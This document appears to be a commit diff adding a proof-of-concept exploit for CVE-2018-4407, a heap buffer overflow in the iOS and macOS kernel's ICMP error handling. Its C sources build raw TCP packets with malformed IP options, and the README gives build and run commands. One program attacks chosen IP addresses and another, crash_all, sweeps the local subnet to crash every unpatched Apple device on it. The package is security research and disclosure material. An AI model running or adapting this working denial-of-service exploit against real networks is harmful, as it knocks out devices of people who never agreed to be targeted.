Exploit PoC for buffer overflow in icmp_error (CVE-2018-4407).

Author: kevinbackhouse

apple/darwin-xnu/icmp_error_CVE-2018-4407/.gitignore

@@ -0,0 +1,3 @@
+*.o
+crash_all
+direct_attack

apple/darwin-xnu/icmp_error_CVE-2018-4407/Makefile

@@ -0,0 +1,22 @@
+all: direct_attack crash_all
+
+direct_attack: direct_attack.o send_packet.o utils.o
+	gcc -O2 -Wall direct_attack.o send_packet.o utils.o -o direct_attack
+
+crash_all: crash_all.o utils.o
+	gcc -O2 -Wall crash_all.o send_packet.o utils.o -o crash_all
+
+direct_attack.o: direct_attack.c send_packet.h utils.h
+	gcc -O2 -Wall -c direct_attack.c
+
+crash_all.o: crash_all.c send_packet.h utils.h
+	gcc -O2 -Wall -c crash_all.c
+
+send_packet.o: send_packet.c send_packet.h utils.h
+	gcc -O2 -Wall -c send_packet.c
+
+utils.o: utils.c utils.h
+	gcc -O2 -Wall -c utils.c
+
+clean:
+	rm -f *~ *.o direct_attack crash_all

apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md

@@ -0,0 +1,35 @@
+## Heap buffer overflow in icmp_error (CVE-2018-4407)
+
+Proof-of-concept exploit for a remotely triggerable heap buffer overflow vulnerability in iOS 11.4.1 and macOS 10.13.6. This exploit can be used to crash any vulnerable iOS or macOS device that is connected to the same network as the attacker's computer. The exploit involves sending a TCP packet with non-default options in the IP and TCP headers. Some routers refuse to deliver such packets, so the exploit might not work on some networks. In particular, most internet routers seem to drop such packets. However, it worked on every home and office network that I have tested it on.
+
+For more information about the vulnerability, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407).
+
+The buffer overflow is in this code [bsd/netinet/ip_icmp.c:339](https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/netinet/ip_icmp.c#L339):
+
+```c
+m_copydata(n, 0, icmplen, (caddr_t)&icp->icmp_ip);
+```
+
+The exploit sets `icmplen == 120`, which is far too big for the destination buffer. The buffer is overwritten with garbage, so this causes the kernel to crash.
+
+## Usage
+
+The exploit code is designed to be built and run on Linux. To build:
+
+```bash
+make
+```
+
+This builds two versions of the PoC: `direct_attack` and `crash_all`. The former requires you to supply the IP addresses of the target machines, like this:
+
+```bash
+sudo ./direct_attack 192.168.0.8 192.168.0.12
+```
+
+The latter does not require you to list the IP addresses:
+
+```bash
+sudo ./crash_all
+```
+
+Use `crash_all` with care: it will crash any unpatched Apple device that is connected to the same network as you.

apple/darwin-xnu/icmp_error_CVE-2018-4407/crash_all.c

@@ -0,0 +1,64 @@
+#include <ifaddrs.h>
+#include "send_packet.h"
+
+// Find all the network interfaces that we are attached to and send
+// out malicious packets to similar IP addresses. For example, if
+// one of our IP addresses is 192.168.0.13, then we will send malicious
+// packets to all addresses in the range 192.168.0.1-255.
+int main(int argc, char *argv[])
+{
+  struct ifaddrs *ifaddr;
+
+  // Create a raw socket for sending the malicious packets.
+  const int sock = create_raw_socket();
+  if (sock < 0) {
+    printf("Failed to create socket. Try running with sudo.\n");
+    return 1;
+  }
+
+  // Get the network interfaces that we are attached to.
+  if (getifaddrs(&ifaddr) < 0) {
+    printf("getifaddrs failed");
+    return 1;
+  }
+
+  // Loop over the network interfaces.
+  struct ifaddrs *ifa;
+  for (ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next) {
+    if (ifa->ifa_addr == NULL)
+      continue;
+
+    if (ifa->ifa_addr->sa_family == AF_INET) {
+      struct sockaddr_in *addr = (struct sockaddr_in *)ifa->ifa_addr;
+      printf("%s: %s\n", ifa->ifa_name, inet_ntoa(addr->sin_addr));
+
+      // Send out malicious packets to 253 similar IP addresses, by
+      // cycling through the final byte of the address. We skip values
+      // 0, 1, and 255 because they are not valid.
+      const uint16_t dst_port = ntohs(22);
+      const uint16_t src_port = ntohs(1234);
+      const uint32_t src = ntohl(addr->sin_addr.s_addr);
+      const uint32_t dst = src & 0xFFFFFF00;
+      size_t i;
+      for (i = 2; i < 255; i++) {
+        const int r0 = send_packet(
+          sock, htonl(src), src_port, htonl(dst | i), dst_port, 0, 0, 1, 0
+        );
+        if (r0 < 0) {
+          printf("send failed %s %ld\n", ifa->ifa_name, i);
+          break;
+        }
+      }
+    }
+  }
+
+  freeifaddrs(ifaddr);
+
+  const int r1 = close(sock);
+  if (r1 < 0) {
+    printf("could not close socket.\n");
+    return -1;
+  }
+
+  return 0;
+}

apple/darwin-xnu/icmp_error_CVE-2018-4407/direct_attack.c

@@ -0,0 +1,45 @@
+#include "send_packet.h"
+
+int main(int argc, char* argv[])
+{
+  if (argc <= 1) {
+    const char* progname = "a.out"; // Default program name
+    if (argc > 0) {
+      progname = argv[0];
+    }
+    printf("Usage: sudo %s <dest ip> <dest ip> ...\n", progname);
+    printf("Example:\n");
+    printf("  sudo %s 192.168.0.8 192.168.0.12\n", progname);
+    return 1;
+  }
+
+  const uint32_t src = 0; // 0net_addr(argv[1]);
+  const uint16_t dst_port = ntohs(22);
+  const uint16_t src_port = ntohs(1234);
+
+  const int sock = create_raw_socket();
+  if (sock < 0) {
+    printf("Failed to create socket. Try running with sudo.\n");
+    return 1;
+  }
+
+  int i;
+  for (i = 1; i < argc; i++) {
+    const uint32_t dst = inet_addr(argv[i]);
+    const int r0 = send_packet(sock, src, src_port, dst, dst_port, 0, 0, 1, 0);
+    if (r0 < 0) {
+      printf("send to %s failed\n", argv[i]);
+      return 1;
+    }
+  }
+
+  const int r1 = close(sock);
+  if (r1 < 0) {
+    printf("could not close socket.\n");
+    return -1;
+  }
+
+  // Data sent successfully
+  printf("Packets sent successfully\n");
+  return 0;
+}

apple/darwin-xnu/icmp_error_CVE-2018-4407/send_packet.c

@@ -0,0 +1,100 @@
+#include "send_packet.h"
+
+// Create and send a TCP packet, which triggers the following callpath:
+//
+// 1. ip_input()                bsd/netinet/ip_input.c:1835
+// 2. call to ip_dooptions()    bsd/netinet/ip_input.c:2185
+// 3. ip_dooptions()            bsd/netinet/ip_input.c:3222
+// 4. goto bad                  bsd/netinet/ip_input.c:3250
+// 5. call icmp_error           bsd/netinet/ip_input.c:3495
+// 6. icmp_error()              bsd/netinet/ip_icmp.c:203
+// 7. call m_copydata()         bsd/netinet/ip_icmp.c:339
+//
+int send_packet(
+  const int sock,
+  const uint32_t src, const uint16_t src_port,  // In network byte order
+  const uint32_t dst, const uint16_t dst_port,  // In network byte order
+  const uint32_t seq, const uint32_t ack_seq,
+  const uint16_t syn, const uint16_t ack
+) {
+  char packet[1024];
+  memset(packet, 0, sizeof(packet));
+
+  struct iphdr* ip_hdr = (struct iphdr*)packet;
+  const size_t ip_hdrlen = 60; // Maximum IP header size.
+  struct tcphdr* tcp_hdr = (struct tcphdr*)(ip_hdrlen + (char*)ip_hdr);
+  const size_t tcp_hdrlen = 60; // Maximum TCP header size.
+  const char* payload = tcp_hdrlen + (char*)tcp_hdr;
+  const size_t payload_len = &packet[sizeof(packet)] - payload;
+
+  // Fill in the IP Header
+  memset(ip_hdr, 0, ip_hdrlen);
+  ip_hdr->ihl = ip_hdrlen >> 2;
+  ip_hdr->version = 4;
+  ip_hdr->tos = 0;
+  ip_hdr->tot_len = ip_hdrlen + tcp_hdrlen + payload_len;
+  ip_hdr->id = htonl (54321);  // Id of this packet
+  ip_hdr->frag_off = 0;
+  ip_hdr->ttl = 255;
+  ip_hdr->protocol = IPPROTO_TCP;
+  ip_hdr->check = 0; // Checksum will be computed later.
+  ip_hdr->saddr = src;
+  ip_hdr->daddr = dst;
+
+  unsigned char* ip_opt = sizeof(struct iphdr) + (unsigned char*)ip_hdr;
+  size_t ip_optlen = ip_hdrlen - sizeof(struct iphdr);
+  memset(ip_opt, IPOPT_NOP, ip_optlen);
+  // This assignment makes the options invalid, which will
+  // trigger the call to icmp_error() at bsd/netinet/ip_input.c:3495
+  ip_opt[ip_optlen-1] = IPOPT_EOL;
+  ip_opt[0] = IPOPT_LSRR;
+  ip_opt[1] = 3;
+  ip_opt[2] = 0; // Invalid: triggers "goto bad" at ip_input.c:3281
+
+  // TCP Header
+  memset(tcp_hdr, 0, tcp_hdrlen);
+  tcp_hdr->source = src_port;
+  tcp_hdr->dest = dst_port;
+  tcp_hdr->seq = seq;
+  tcp_hdr->ack_seq = ack_seq;
+  tcp_hdr->doff = tcp_hdrlen >> 2;
+  tcp_hdr->fin = 0;
+  tcp_hdr->syn = syn;
+  tcp_hdr->rst = 0;
+  tcp_hdr->psh = 0;
+  tcp_hdr->ack = ack;
+  tcp_hdr->urg = 0;
+  tcp_hdr->window = htons (5840); // maximum allowed window size
+  tcp_hdr->check = 0; // Checksum will be computed later
+  tcp_hdr->urg_ptr = 0;
+
+  // Compute checksums.
+  tcp_checksum(
+    ip_hdr,
+    ip_hdrlen,
+    tcp_hdr,
+    tcp_hdrlen,
+    payload,
+    payload_len
+  );
+
+  // Send the packet
+  struct sockaddr_in sin;
+  memset(&sin, 0, sizeof(sin));
+  sin.sin_family = AF_INET;
+  sin.sin_port = dst_port;
+  sin.sin_addr.s_addr = dst;
+
+  const int r0 =
+    sendto(
+      sock, packet, ip_hdr->tot_len, 0,
+      (struct sockaddr *)&sin, sizeof(sin)
+    );
+  if (r0 < 0) {
+    const int err = errno;
+    printf("send failed %d err=%d %s\n", r0, err, strerror(err));
+    return -1;
+  }
+
+  return 0;
+}

apple/darwin-xnu/icmp_error_CVE-2018-4407/send_packet.h

@@ -0,0 +1,9 @@
+#include "utils.h"
+
+int send_packet(
+  const int sock,
+  const uint32_t src, const uint16_t src_port,  // In network byte order
+  const uint32_t dst, const uint16_t dst_port,  // In network byte order
+  const uint32_t seq, const uint32_t ack_seq,
+  const uint16_t syn, const uint16_t ack
+);